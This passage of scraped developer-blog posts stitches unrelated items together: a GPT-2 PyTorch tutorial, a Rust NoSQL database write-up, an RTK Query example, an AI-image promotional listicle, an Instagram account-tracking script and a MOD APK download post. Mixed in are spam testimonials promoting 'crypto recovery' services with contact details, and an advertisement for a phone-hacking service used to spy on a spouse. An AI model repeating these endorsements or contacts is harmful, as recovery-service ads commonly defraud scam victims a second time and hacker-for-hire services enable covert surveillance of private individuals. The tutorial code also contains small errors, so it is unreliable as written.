of financial ruin or falling victim to the siren song of fraudulent schemes, I implore you—do not lose hope. There are reputable recovery services like Cyber Constable Intelligence out there, ready and willing to lend a helping hand in your worst hour. I urge all who read this to heed my cautionary tale and approach investments with the utmost care and diligence. Stay safe, stay informed, and may your financial endeavors be guided by wisdom and prudence.
mary_joyce_8aff0cb5c2b5f2
1,912,129
Bus Simulator code
You can download Bus Simulator Ultimate MOD APK from various APK websites. Always ensure you are...
0
2024-07-05T01:58:22
https://dev.to/dk_bymedk_ed5eb6e885850/bus-simulator-code-1elc
webdev, beginners, programming
You can download [Bus Simulator Ultimate MOD APK](https://bussimulatorultimatemodapk.net/) from various APK websites. Always ensure you are using trusted sources to avoid malware and other security risks. Sites like APKPure or APKMirror are generally considered reliable. Remember that using MOD APKs might violate the game's terms of service. Proceed with caution and at your own risk.
dk_bymedk_ed5eb6e885850
1,912,128
Here's how you can build and train GPT-2 from scratch using PyTorch
Are you tired of always using ChatGPT and curious about how to build your own language model? Well,...
0
2024-07-05T01:58:05
https://dev.to/amit_kharel_aae65abe2b111/heres-how-you-can-build-and-train-gpt-2-from-scratch-using-pytorch-345n
chatgpt, gpt3, llm, ai
Are you tired of always using ChatGPT and curious about how to build your own language model? Well, you’re in the right place! Today, we’re going to create GPT-2 , a powerful language model developed by OpenAI, from scratch that can generate human-like text by predicting the next word in a sequence. To dive deeper into the theory and architecture of GPT-2, I highly recommend reading [The Illustrated GPT-2](https://jalammar.github.io/illustrated-gpt2/) by Jay Alammar. This article provides an excellent visual and intuitive explanation of GPT-2 and its inner workings. I’ll be referring to some of the visuals from the article to explain things better. > I have tried to make this as simpler as possible. Anyone with any level of Python or machine learning can follow along and build the model. ## Resources This project will take you through all the steps for building a simple GPT-2 model and train on bunch of Taylor Swift and Ed Sheeran songs. We’ll see what it will come up at the end :). The dataset and source codes for this article will be available in [Github](https://medium.com/r?url=https%3A%2F%2Fgithub.com%2Fajeetkharel%2Fgpt2-from-scratch). > I’ll also add a Jupyter Notebook which replicates this article so you can follow along with running code and understanding side-by-side. ## Building GPT-2 Architecture We will take this project step-by-step by continuously improving a bare-bone model and adding layers based on the original [GPT-2](https://cdn.openai.com/better-language-models/language_models_are_unsupervised_multitask_learners.pdf) implementation. Here are the steps we will follow: 1. **Building a custom Tokenizer** 2. **Building a Data Loader** 3. **Train a simple language model** 4. **Implement GPT-2 architecture (part 2)** [🔗] (https://medium.com/@mramitkharel/heres-how-you-can-build-and-train-gpt-2-from-scratch-using-pytorch-part-2-9b41d15baf62) This project is divided into two parts, the first one goes through the basics of language modelling and [Part 2](https://medium.com/@mramitkharel/heres-how-you-can-build-and-train-gpt-2-from-scratch-using-pytorch-part-2-9b41d15baf62) jumps straight into GPT-2 implementation. I suggest you to follow along with the article and build it yourself which makes learning GPT-2 more interesting and fun. > Note: This whole project will be done in a single python file so it will be easy for you to follow along block by block. Final Model: ![GPT-2 Model Architecture](https://cdn-images-1.medium.com/max/2000/1*35AaHBa5imxVIbbjByIE2Q.png) Final Model output: Your summer has a matter likely you trying I wish you would call Oh-oh, I'll be a lot of everyone I just walked You're sorry"Your standing in love out, And something would wait forever bring 'Don't you think about the story If you're perfectly I want your beautiful You had sneak for you make me This ain't think that it wanted you this enough for lonely thing It's a duchess and I did nothin' home was no head Oh, but you left me Was all the less pair of the applause Honey, he owns me now But've looks for us?" If I see you'll be alright You understand, a out of the Wait for me I can't call Everything Oh, no words don't read about me You should've been so You're doing what you so tired, If you, you got perfect fall Like the song? Then let’s get building.. ## **1. Building a custom Tokenizer** Language models don’t see text like us. Instead they recognize sequence of numbers as tokens of specific text. So, the first step is to import our data and build our own character level Tokenizer. data_dir = "data.txt" text = open(data_dir, 'r').read() # load all the data as simple string # Get all unique characters in the text as vocabulary chars = list(set(text)) vocab_size = len(chars) Example: ![](https://cdn-images-1.medium.com/max/2000/1*34WkqssQKHKpdO1yTH0n-g.png) If you see the output above, we have a list of all unique characters extracted from the text data in the initialization process. Character tokenization is basically using the index position of characters from the vocabulary and mapping it to corresponding character in the input text. # build the character level tokenizer chr_to_idx = {c:i for i, c in enumerate(chars)} idx_to_chr = {i:c for i, c in enumerate(chars)} def encode(input_text: str) -> list[int]: return [chr_to_idx[t] for t in input_text] def decode(input_tokens: list[int]) -> str: return "".join([idx_to_chr[i] for i in input_tokens]) Example: ![](https://cdn-images-1.medium.com/max/2000/1*adFjPqc2Ks1MY2uXuB9DGQ.png) Convert our text data into tokens: Installation: pip install torch import torch # use cpu or gpu based on your system device = "cpu" if torch.cuda.is_available(): device = "cuda" # convert our text data into tokenized tensor data = torch.tensor(encode(text), dtyppe=torch.long, device=device) Now, we have the tokenized tensor data where each characters in the text is converted to the respective tokens. **So far:** import torch data_dir = "data.txt" text = open(data_dir, 'r').read() # load all the data as simple string # Get all unique characters in the text as vocabulary chars = list(set(text)) vocab_size = len(chars) # build the character level tokenizer chr_to_idx = {c:i for i, c in enumerate(chars)} idx_to_chr = {i:c for i, c in enumerate(chars)} def encode(input_text: str) -> list[int]: return [chr_to_idx[t] for t in input_text] def decode(input_tokens: list[int]) -> str: return "".join([idx_to_chr[i] for i in input_tokens]) # convert our text data into tokenized tensor data = torch.tensor(encode(text), dtyppe=torch.long, device=device) ## **2. Building a Data Loader** Now, before building our model, we have to define how we are going to feed the data into the model for training and what the data looks like in terms of dimensions and batch size. Let’s define our data loader as below: train_batch_size = 16 # training batch size eval_batch_size = 8 # evaluation batch size context_length = 256 # number of tokens processed in a single batch train_split = 0.8 # percentage of data to use from total data for training # split data into trian and eval n_data = len(data) train_data = data[:int(n_data * train_split)] eval_data = data[int(n_data * train_split):] class DataLoader: def __init__(self, tokens, batch_size, context_length) -> None: self.tokens = tokens self.batch_size = batch_size self.context_length = context_length self.current_position = 0 def get_batch(self) -> torch.tensor: b, c = self.batch_size, self.context_length start_pos = self.current_position end_pos = self.current_position + b * c + 1 # if the batch exceeds total length, get the data till last token # and take remaining from starting token to avoid always excluding some data add_data = -1 # n, if length exceeds and we need `n` additional tokens from start if end_pos > len(self.tokens): add_data = end_pos - len(self.tokens) - 1 end_pos = len(self.tokens) - 1 d = self.tokens[start_pos:end_pos] if add_data != -1: d = torch.cat([d, self.tokens[:add_data]]) x = (d[:-1]).view(b, c) # inputs y = (d[1:]).view(b, c) # targets self.current_position += b * c # set the next position return x, y train_loader = DataLoader(train_data, train_batch_size, context_length) eval_loader = DataLoader(eval_data, eval_batch_size, context_length) Example: ![](https://cdn-images-1.medium.com/max/2000/1*GMpC_jFxFpk_1xK19YvbrA.png) Now we have our own customized data loader for both training and evaluation. The loader has a get_batch function which returns batches of batch_size * context_length. If you are wondering why x is from start to end and y is from start+1 to end+1, it’s because the main task for this model will be to predict next sequence given the previous. So there will be an extra token in y for it to predict the (n+1) token given last n tokens of x. If it sounds complicated look at the below visual: ![*Figure 2: GPT-2 Input & Output flow from “The Illustrated GPT-2” by Jay Alammar.*](https://cdn-images-1.medium.com/max/2864/0*jTrSzRD-KGPs3v5E.gif) ## **3. Train a simple language model** Now we are ready to build and train a simple language model using the data we have just loaded. For this section, we will keep it very simple and implement a simple Bi-Gram Model where given the last token predict the next token. As you can see below we will be using just the Embedding layer while ignoring the main decoder block. An Embedding layer represents n = d_model unique properties of all the characters in our vocabulary and based on which the layer pops out the property using the token index or in our case the index of our character in the vocabulary. You will be amazed how well the model will behave just by using the Embeddings. And we will be improving the model step by step by adding more layers, so sit tight and follow along. ![Simple Bi-Gram Model](https://cdn-images-1.medium.com/max/2000/1*9cYT2nBANRzBr3vqQVLBsw.png) **Initialization**: # used to define size of embeddings d_model = vocab_size The embedding dimension or d_model is vocab_size currently because the final output has to map to the logits for each character in vocab to calculate their probabilities. Later on we will introduce a Linear layer which will map d_model to vocab_size and then we can have a custom embedding_dimension. **Model**: import torch.nn as nn import torch.nn.functional as F class GPT(nn.Module): def __init__(self, vocab_size, d_model): super().__init__() self.wte = nn.Embedding(vocab_size, d_model) # word token embeddings def forward(self, inputs, targets = None): logits = self.wte(inputs) # dim -> batch_size, sequence_length, d_model loss = None if targets != None: batch_size, sequence_length, d_model = logits.shape # to calculate loss for all token embeddings in a batch # kind of a requirement for cross_entropy logits = logits.view(batch_size * sequence_length, d_model) targets = targets.view(batch_size * sequence_length) loss = F.cross_entropy(logits, targets) return logits, loss def generate(self, inputs, max_new_tokens): # this will store the model outputs along with the initial input sequence # make a copy so that it doesn't interfare with model for _ in range(max_new_tokens): # we only pass targets on training to calculate loss logits, _ = self(inputs) # for all the batches, get the embeds for last predicted sequence logits = logits[:, -1, :] probs = F.softmax(logits, dim=1) # get the probable token based on the input probs idx_next = torch.multinomial(probs, num_samples=1) inputs = torch.cat([inputs, idx_next], dim=1) # as the inputs has all model outputs + initial inputs, we can use it as final output return inputs m = GPT(vocab_size=vocab_size, d_model=d_model).to(device) We have now successfully defined our model with just one Embedding layer and Softmax for token generation. Let’s see how our model behaves when given some input characters. ![Output](https://cdn-images-1.medium.com/max/2000/1*dQpkxEARkvXbpJpI7dCRYA.png) 😄 Pretty interesting!! But we are not quite there yet. Now the final step is to train our model and give it some knowledge about the characters. Let’s setup our optimizer. We will use a simple AdamW optimizer for now with 0.001 learning rate. We will go through improving the optimization in later sections. lr = 1e-3 optim = torch.optim.AdamW(m.parameters(), lr=lr) Below is a very simple training loop. epochs = 5000 eval_steps = 1000 # perform evaluation in every n steps for ep in range(epochs): xb, yb = train_loader.get_batch() logits, loss = m(xb, yb) optim.zero_grad(set_to_none=True) loss.backward() optim.step() if ep % eval_steps == 0 or ep == epochs-1: m.eval() with torch.no_grad(): xvb, yvb = eval_loader.get_batch() _, e_loss = m(xvb, yvb) print(f"Epoch: {ep}\tlr: {lr}\ttrain_loss: {loss}\teval_loss: {e_loss}") m.train() # back to training mode Let’s run: ![Output](https://cdn-images-1.medium.com/max/2000/1*ikOrVlB0KHzrTWTpOLi9Lw.png) So we got a pretty good loss result. But we are not there yet. As you can see, the error decreased by a higher amount until epoch 2000 and not much improvements afterwards. It’s because the model doesn’t yet have much brain power (or layers/neural networks) and it’s just comparing embedding of one character with another. The output now looks like below: ![Output](https://cdn-images-1.medium.com/max/2000/1*fEEJXUZrhAIORdD0tXk_wA.png) 😮 OK!! Not very pleasing but definitely some improvements than the first generation which was without any training (Obviously). The model is starting to know how the songs are formatted and the lines and everything which is pretty impressive. Now, as this article is getting too longer, I will add rest of the sections in the Part 2 below: * [Build and Train GPT-2 (Part 2)](https://medium.com/@amitkharel/heres-how-you-can-build-and-train-gpt-2-from-scratch-using-pytorch-part-2-9b41d15baf62) Thanks for reading the article. I hope you learned something new. If you have any questions/feedback, feel free to leave a comment. ## References *Automatic Arabic Poem Generation with GPT-2 — Scientific Figure on ResearchGate. Available from: [https://www.researchgate.net/figure/GPT-2-architecture-Heilbron-et-al-2019_fig1_358654229](https://www.researchgate.net/figure/GPT-2-architecture-Heilbron-et-al-2019_fig1_358654229)* *Alammar, J (2018). The Illustrated GPT-2 [Blog post]. Retrieved from [*https://jalammar.github.io/illustrated-gpt2/](https://jalammar.github.io/illustrated-gpt2/)
amit_kharel_aae65abe2b111
1,912,125
A Simple Instagram Tracking Script Written in Python
python3 main.py -h usage: Instagram Tracker [-h] -u USERNAME 📸 an Instagram tracker that logs...
0
2024-07-05T01:56:17
https://dev.to/ibnaleem/a-simple-instagram-tracking-script-written-in-python-in9
python, opensource, security, cybersecurity
![proof of concept](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/tittxxd7sbe73yq44sk1.png) ``` python3 main.py -h usage: Instagram Tracker [-h] -u USERNAME 📸 an Instagram tracker that logs any changes to an Instagram account (followers, following, posts, and bio) options: -h, --help show this help message and exit -u USERNAME, --username USERNAME The username of the account to track 🤝 Contribute: https://github.com/ibnaleem/instatracker ``` > You must login to *your* Instagram account in order to properly scrape someone else's Instagram account. This is due to Instagram blocking `HTTPS GET` requests from unauthenticated cookies. Your login information is never stored. See more [here](https://github.com/ibnaleem/instatracker/blob/main/main.py#L51C1-L56C136) and [here](https://github.com/instaloader/instaloader/blob/master/instaloader/instaloadercontext.py#L253C1-L338C43). > You can always create/use an alt-account for the login. ## Installation > [Install Python if you don't have it already](https://www.python.org/downloads/) ### Clone this repository: ``` $ git clone https://github.com/ibnaleem/instatracker.git ``` ### Install dependencies: ``` $ pip install -r requirements.txt ``` ### Set `user` & `passwd` field on [line 56](https://github.com/ibnaleem/instatracker/blob/main/main.py#L56) ```python self.bot.login(user="YOUR INSTAGRAM USERNAME", passwd="YOUR INSTAGRAM PASSWORD") # this allows us to access & scrape Instagram. ``` ### Run the script ``` $ python3 main.py -u USERNAME ``` ## Automated Logging [InstaTracker](https://github.com/ibnaleem/instatracker) not only displays all modifications an Instagram account makes directly to the terminal (e.g., *USERNAME has unfollowed 1 person*), but it also records these changes in a text file, including the date and time. ``` ------2024-06-30 01:01:13.659694+00:00------ johndoe has 100 johndoe is following 100 people johndoe has 0 posts johndoe has the following bio: this is my biography ------2024-06-31 02:03:15.761715+00:00------ johndoe has lost 2 followers (100 followers --> 98 followers) ------2024-06-31 05:03:15.761715+00:00------ johndoe has gained 5 followers (98 followers --> 103 followers) ... ``` This script checks for any changes every 5 minutes because Instagram's firewall starts blocking requests that are sent too quickly. You can manually update this [here](https://github.com/ibnaleem/instatracker/blob/main/main.py#L70), but do not be surprised if the script stops working. ## Built With - [Python](https://www.python.org/) - [Instaloader](https://github.com/instaloader/instaloader) - [Rich](https://github.com/Textualize/rich) ## LICENSE This repository is under the [MIT License](https://github.com/ibnaleem/instatracker/blob/main/LICENSE) ## Created By [Ibn Aleem](https://www.linkedin.com/in/shaffan-aleem-b7a852255/)
ibnaleem
1,912,127
BRILLIANT CRYPTO/UDST RECOVERY EXPERT/(FOLKWIN EXPERT RECOVERY)
I believe I have fallen victim to a sophisticated scam orchestrated by deceitful individuals. It all...
0
2024-07-05T01:55:04
https://dev.to/dionysios_aikaterina_ad9c/brilliant-cryptoudst-recovery-expertfolkwin-expert-recovery-gc
I believe I have fallen victim to a sophisticated scam orchestrated by deceitful individuals. It all began when I received an invitation to trade on a platform website, lured in by promises of substantial returns on investments. Intrigued by the potential profits, I transferred $76,000 USD to this platform. Initially, everything seemed promising as I witnessed a supposed profit of $34,000 USD added to my initial capital. However, my optimism quickly turned to suspicion when I was coerced into transferring an additional $5,000 USD to avoid having my funds blocked. As if that wasn't enough, I was then asked for another $10,000 USD, which raised serious red flags. The simplicity of the website compared to the one initially presented to me further fueled my doubts. Realizing that I may have fallen into a scam, I embarked on a mission to uncover the truth. Through diligent research and seeking advice, I stumbled upon <FOLKWIN EXPERT RECOVERY>, a renowned entity specializing in retrieving funds lost to fraudulent schemes. With no time to waste, I decided to enlist their services, desperate to salvage what remained of my investments. Despite the initial skepticism about online recovery services, I was willing to take the chance. <FOLKWIN EXPERT RECOVERY> proved to be a beacon of hope in my darkest hour. Within an astonishingly short span of less than 32 hours, they successfully recovered all my funds. The relief and gratitude I felt were immeasurable, knowing that I had avoided a catastrophic loss thanks to their expertise and swift action. While their services were not without cost, the investment was undeniably worthwhile given the alternative of losing everything to unscrupulous scammers. I am compelled to share my experience with <FOLKWIN EXPERT RECOVERY> as a testament to their efficacy and reliability. Their dedication to their clients are unmatched, providing a lifeline for individuals like myself who have fallen prey to financial fraud. I wholeheartedly recommend <FOLKWIN EXPERT RECOVERY> to anyone grappling with similar circumstances. Their ability to navigate complex financial landscapes and retrieve stolen funds is a testament to their expertise and commitment to justice. It is crucial to exercise caution and conduct thorough due diligence before engaging in financial transactions. Trusting reputable recovery services like <FOLKWIN EXPERT RECOVERY> can make all the difference in recovering lost funds and restoring peace of mind. Their track record speaks for itself, offering reassurance to victims and a deterrent to would-be scammers. <FOLKWIN EXPERT RECOVERY> has reaffirmed my belief in the power of resilience and informed decision-making. By sharing my story, I hope to raise awareness and prevent others from falling victim to similar fraudulent schemes. Remember, if you find yourself ensnared by financial fraudsters, there is hope. Contact <FOLKWIN EXPERT RECOVERY> for help, through this details below:: INFO (WhatsApp): +1 (740)705-0711 INFO (Email): FOLKWINEXPERTRECOVERY @ TECH-CENTER dot COM INFO (Website): WWW.FOLKWINEXPERTRECOVERY.COM God bless, Miss Dionysios Aikaterina .. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/188j9y4hwzoh3akobjw0.jpg)
dionysios_aikaterina_ad9c
1,912,126
WEB BAILIFF CONTRACTORS LEGIT PHONE HACKER
I suspected my wife of 5 years of cheating on me and it turned out she was seeing her high school...
0
2024-07-05T01:52:57
https://dev.to/philip_grisly_ecd2f26ea7b/web-bailiff-contractors-legit-phone-hacker-22f8
I suspected my wife of 5 years of cheating on me and it turned out she was seeing her high school lover even though we have 2 little children. I hopped on the internet to look for a phone hacker so that I could confirm my fears when I came across Web Bailiff Contractors who has hundreds of reviews as legit phone hackers. I gave them her info and they got back to me me in about 4 hours. You can just search them on google and head on to their website where you can communicate via the chat feature or the contact details displayed.I suspected my wife of 5 years of cheating on me and it turned out she was seeing her high school lover even though we have 2 little children. I hopped on the internet to look for a phone hacker so that I could confirm my fears when I came across Web Bailiff Contractors who has hundreds of reviews as legit phone hackers. I gave them her info and they got back to me me in about 4 hours. You can just search them on google and head on to their website where you can communicate via the chat feature or the contact details displayed
philip_grisly_ecd2f26ea7b
1,911,301
Best 5 AI Girl Generators for Realistic Creations in 2024
Explore the top 5 AI girl generators to create realistic AI girls. Find how to develop your own AI...
0
2024-07-05T01:47:36
https://dev.to/novita_ai/best-5-ai-girl-generators-for-realistic-creations-in-2024-3pki
Explore the top 5 AI girl generators to create realistic AI girls. Find how to develop your own AI girl generator in our blog. ## Introduction Artificial Intelligence is evolving rapidly and making its way to every industry. AI girl generators are one of the most interesting applications of AI in recent times. They allow you to create lifelike images of girls using computer algorithms that can generate realistic features.  In this blog, we will understand what AI girl generators are, their features, and how they can be used. We have also compiled a list of the best five AI girl generators for you to choose from. Additionally, we will provide APIs to help you develop your own AI girl generator. So, let's dive into the world of AI girl generators and explore if they could be the future of digital art! ## Understanding AI Girl Generators Utilizing AI algorithms, AI girl generators provide a convenient and efficient way to create virtual characters. ### What are AI Girl Generators? AI Girl Generators are tools powered by artificial intelligence, allowing users to create and customize AI digital Girls in various styles. They utilize deep learning skills to recognize and replicate complex patterns from the training dataset, and then create a generative model. With the power of Natural Language Processing (NLP), they translate text prompts into visual elements and synthesize an image. ### Features of AI Girl Generators - **User-Friendly Interface:** AI girl generators offer intuitive interfaces that make it easy for beginners to create their own AI girls. - **High Customization:** Users can customize AI girls according to their preferences, including facial features, hairstyles, clothing, and more. - R**ealism and Detail:** Advanced AI algorithms enable these generators to produce AI girls with lifelike facial features, skin textures, and body movements. - **Diverse Styles Options:** AI Girl Generators can create girls in a wide range of styles, such as fantasy girls, warrior girls, magical girls, schoolgirls, and princess girls. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/rdzrhrj6uw7u0dg9cs6t.png) ## Top 5 AI Girl Generators for Realistic Creations in 2024 Get a deeper understanding of the AI girl generator from the features of the best five AI girl generators in the market in 2024. ### Fotor Fotor, as an AI girl generator, is recognized for its ability to quickly produce hyper-realistic images of female characters based on textual descriptions or uploaded images. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/hpgcuqnpejuf89o1crnt.png) **Features** - It is compatible with both PC and mobile devices. - It provides a free trial. ### Artguru AI With ArtGuru's powerful text-to-image generator, you can generate stunning AI girls of all styles, such as realistic portraits, anime characters, imaginary beings, and more - all from descriptive text prompts. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/861qo62gr11yp8kpx04e.png) **Features** - The generated images can be used for commercial purposes. - Artguru AI provides various art styles, catering to diverse preferences. - It is accessible both online and via mobile applications. ### SoulGen SoulGen offers a versatile image generation tool that combines art style transfer, animation, and extensive customization features. Soulgen's concept designs stand out for their realistic aesthetics and high-quality outputs, making virtual girl characters visually captivating.  ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/w3dhreqi5bbdda9qe4ft.png) **Features** - Its pricing plans are flexible. - Regular updates of its image generation capabilities. ### BasedLabs BasedLabs is a platform that offers a suite of AI-powered tools designed to assist creators in generating and editing images and videos with high levels of realism and customization. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/8pb1dm2r3ezmxu1z6n6m.png) **Features** - BasedLabs is designed to be user-friendly. - Users have full rights to use their AI-generated art. ### Novita AI **[Novita AI](https://novita.ai/)** is an emerging AI platform that not only can be used as an AI girl generator with various models but also provides over 100 APIs for developers to create and improve their existing generators. It offers flexible billing options without **[GPU](https://novita.ai/)** maintenance expenses. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/9w0v62wyqmvm9rvvoad6.png) **Features** - Hundreds of APIs for developing AI tools. - 1000+ models for AI girl image generation. - Effortless Access and Scalable. ## How to Use an AI Girl Generator? With innumerable AI girl generators in the market, you can create your AI girls effortlessly nowadays. Here is a comprehensive guide on how to generate your AI girls from text description through Novita AI. ### Step-by-Step Guide to Creating Your Unique AI Girl - Step 1: Open the Novita AI website and create an account. - Step 2: Navigate to "**[txt2img](https://novita.ai/playground#txt2img)**" in its "Playground". - Step 3: Select a desired model from the list, like anime, digital art, and so on. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/x8p9sovpnwmxbaxa44cu.png) - Step 4: Enter the "Prompt" to describe your AI girl, including her facial expressions, hairstyle, and facial texture. - Step 5: Set the other parameters. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/9mhxn99se9tic9c5a7sv.png) - Step 6: Generate and wait for your AI girls. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/613ucfnkyxlnhqz64meg.png) ### Tips to Enhance Your Experience with AI Girl Generators - Experiment with various text prompts for generating unique anime characters.  - Join Discord communities to share and learn new character-creation techniques.  - Explore artwork possibilities beyond anime, such as Disney or manga characters. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/43s32rhpdkgy447ttvno.png) ## Try to Develop Your Own AI Girl Generator The functions and models in Novita AI and other AI girl generators are pre-set. If you are not satisfied with them, you can develop your own AI girl generator to cater to your preference by easily integrating APIs. ### How to Develop an AI Girl Generator Through APIs? - Step 1: In Novita AI, navigate to the "**[API]( ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/s9wos7mwj17uf9xe8fps.png) )**" and get the API key of the function you want, like Text to Image and Image to Image. - Step 2: Integrate the API key into your project backend, including making API requests, waiting for a response, and figuring out the one that fits into your remand. - Step 3: Give everything a thorough check over time, ensuring all works just as expected. - Step 4: Operate your project. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/gs8jjc8w3gdzbudlco1d.png) ### Practical Applications of AI Girl Generator - **Digital Art and Illustration:** Artists can use AI girl generators to create unique AI art without the need for traditional drawing skills. - **Animation:** Animators can use images of AI anime girls as a starting point for 2D or 3D animations, or to create entire animated sequences. - **Virtual Influencers:** AI girl generators can be used to create virtual influencers for social media to engage with audiences through interactive content. - **AR and VR:** AI-generated characters can be integrated into AR and VR experiences, providing interactive and immersive environments. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/8jpryka2gs07dtdrpv4t.png) ## Future of AI Girl Generators in Digital Art The future of AI Girl Generators in digital art is poised to be transformative and multifaceted, as these tools continue to evolve and integrate with artistic practices. They offer new possibilities for creativity, collaboration, and cultural expression. Artists and creators will likely continue to explore the boundaries of what is possible with these tools, leading to an exciting future for digital art. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/qwqd6qealwiw7h6a0urp.png) ## Conclusion In conclusion, AI girl generators have revolutionized the world of digital art by providing a realistic and customizable approach to character creation. From Fotor to Novita AI, each platform has its unique features and advantages. As technology continues to advance, AI girl generators are likely to play an even bigger role in the future of digital art, opening up new possibilities and pushing the boundaries of creativity. So dive into the world of AI girl generators and unleash your artistic potential! > Originally published at [Novita AI](https://blogs.novita.ai/best-5-ai-girl-generators-for-realistic-creations-in-2024/?utm_source=dev_image&utm_medium=article&utm_campaign=ai-girl) > [Novita AI](https://novita.ai/?utm_source=dev_image&utm_medium=article&utm_campaign=top-5-ai-girl-generators-for-realistic-creations) is the all-in-one cloud platform that empowers your AI ambitions. With seamlessly integrated APIs, serverless computing, and GPU acceleration, we provide the cost-effective tools you need to rapidly build and scale your AI-driven business. Eliminate infrastructure headaches and get started for free - Novita AI makes your AI dreams a reality.
novita_ai
1,908,378
I created a nosql DB using rust
Well when i say i created a Nosql db using rust i mean kind of. like people ask me why would you do...
0
2024-07-05T01:42:42
https://dev.to/arindam_roy_382/i-created-a-nosql-db-using-rust-4lo5
programming, rust, database
Well when i say i created a Nosql db using rust i mean kind of. like people ask me why would you do that i always ask myself why not someone even though making js in 10 days would be good idea so i really don't think it would be consider as the most bad idea. so a Nosql db let's talk about this first so what is database is from our computer science class we all know database is a tool for storing and accessing the data . Now a database is consist of three many things it can have more components but this are the basic one ![visual presentation of my db](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/epdw15s92yefc30mamw6.png) 1) Data model (representation of the way we define models for db) 2) Storage Engine (responsible for storing , clearing disk and memory to access or delete data) 3) query engine (responsible for the talking to the db) Ok now let's define the document model first . I'm designing this after the mongodb document model which was made using c++ so it supports much more data types but we will make a very simple implementation of this. ```rust #[derive(Debug, Clone, Serialize, Deserialize)] pub struct Document { id: Uuid, created_at: DateTime<Utc>, updated_at: DateTime<Utc>, data: HashMap<String, Value>, } // document model #[derive(Debug, Clone, Serialize, Deserialize, PartialEq)] pub enum Value { Null, Boolean(bool), Integer(i64), Float(f64), String(String), Array(Vec<Value>), Object(HashMap<String, Value>), Date(DateTime<Utc>), } // basically we can put any kind of data into our db ``` so now we know how is our data gonna look like once it gets stored but how to store it is a challenge because remember in a database the most important part is saving something and retrieving something. we analyzed any database performance by it's read and write speed so it's absolutely crucial how you store your data . so i took a very simple approach here i just saved the data into the disk and kept a cache in the ram for faster retrieval. ```rust #[derive(Debug, Clone, Serialize, Deserialize)] struct BlockMetadata { id: String, size: usize, next_block: Option<u64>, } #[derive(Debug, Clone, Serialize, Deserialize)] struct Block { metadata: BlockMetadata, data: Vec<u8>, } // we use block to store the data in disk struct DiskManager { file: File, free_blocks: VecDeque<u64>, } struct Cache { blocks: HashMap<u64, Block>, lru: VecDeque<u64>, } // A deque tracking the least recently used (LRU) blocks for cache eviction. pub struct StorageEngine { disk: DiskManager, cache: Cache, index: HashMap<String, u64>, // Document ID to first block number } // is the core structure that ties everything together ``` Now we know how to store our data and after storing how it look like now we need to access the data for that we'll create a query engine of our own. I thought of creating a new template language for accessing the data then i though we are far behind the days of useless query language template like AWS velocity template language like honestly who though that was a good idea ? Anyway for our simple program i just put a bunch of operations in an enum and wallah ```rust #[derive(Debug, Clone)] pub enum Operator { Eq, Ne, Gt, Lt, Gte, Lte, In, Nin, } // very basic euals , not equals , greater than ,less than, grater than equal , Inside the array , not inside the array #[derive(Debug, Clone)] pub struct Condition { field: String, operator: Operator, value: Value, } #[derive(Debug, Clone)] pub struct Query { conditions: Vec<Condition>, } ``` Now for the final part to test out your own db . I'm not gonna lie it's not a good experience i still haven't created an library for talking to this db easily so you have to set some stuff up. first create a function for initializing a new document ```rust fn create_test_document(name: &str, age: i64, city: &str) -> Document { let mut doc = Document::new(); doc.insert("name".to_string(), Value::String(name.to_string())); doc.insert("age".to_string(), Value::Integer(age)); doc.insert("city".to_string(), Value::String(city.to_string())); doc } ``` then you can use this function to add as many data as you want ```rust let db_path = Path::new("test.bin"); let mut storage = StorageEngine::new(db_path).unwrap(); let doc1 = create_test_document("Alice", 30, "New York"); let doc2 = create_test_document("Bob", 25, "San Francisco"); let doc3 = create_test_document("Charlie", 35, "New York"); storage .write( doc1.id().to_string().as_str(), &serde_json::to_vec(&doc1).unwrap(), ) .expect("Failed to write doc1"); storage .write( doc2.id().to_string().as_str(), &serde_json::to_vec(&doc2).unwrap(), ) .expect("Failed to write doc2"); storage .write( doc3.id().to_string().as_str(), &serde_json::to_vec(&doc3).unwrap(), ) .expect("Failed to write doc3"); ``` Just judging by the performance test i ran on my own computer I'm hopeful this can be an actual thing someday . even though i only created this as a fun project i still have so many things planned we can do so if you guys are interested and want to be a part of the project just create a PR in github. This was made solely because of learning and understanding so if you have any suggestion or complains you can choose to do so in github. here is the github project link [Github](https://github.com/arindam923/rust-nosql-db) thank you for sticking to the very end.
arindam_roy_382
1,912,123
Using Redux Toolkit Query to Create an Authentication API with ``injectEndpoints``
When working with modern web applications, managing API calls efficiently is crucial. Redux Toolkit...
0
2024-07-05T01:41:25
https://dev.to/forhad96/using-redux-toolkit-query-to-create-an-authentication-api-with-injectendpoints-2h57
When working with modern web applications, managing API calls efficiently is crucial. Redux Toolkit Query (RTK Query) simplifies this process by providing powerful tools to define and interact with your APIs. In this blog post, we will explore how to use RTK Query to create an authentication API, focusing on the **`injectEndpoints`** method. Additionally, we'll cover how to handle cookies for session management and provide a crucial tip about enabling CORS. ## Setting Up Your Base API First, let's set up your base API using RTK Query. This base API is where you will inject your endpoints. ```javascript import { createApi, fetchBaseQuery } from "@reduxjs/toolkit/query/react"; export const baseApi = createApi({ reducerPath: "baseApi", baseQuery: fetchBaseQuery({ baseUrl: "http://localhost:5000/api/v1", credentials: "include", // Ensure cookies are included in requests }), endpoints: () => ({}), }); ``` ## Injecting Endpoints To manage authentication, we will inject an endpoint for the login function. This is done using the **`injectEndpoints`** method provided by RTK Query. ```javascript import { baseApi } from "../../api/baseApi"; const authApi = baseApi.injectEndpoints({ endpoints: (builder) => ({ login: builder.mutation({ query: (userInfo) => ({ url: "/auth/login", method: "POST", body: userInfo, }), }), }), }); export const { useLoginMutation } = authApi; ``` In this example: - We call 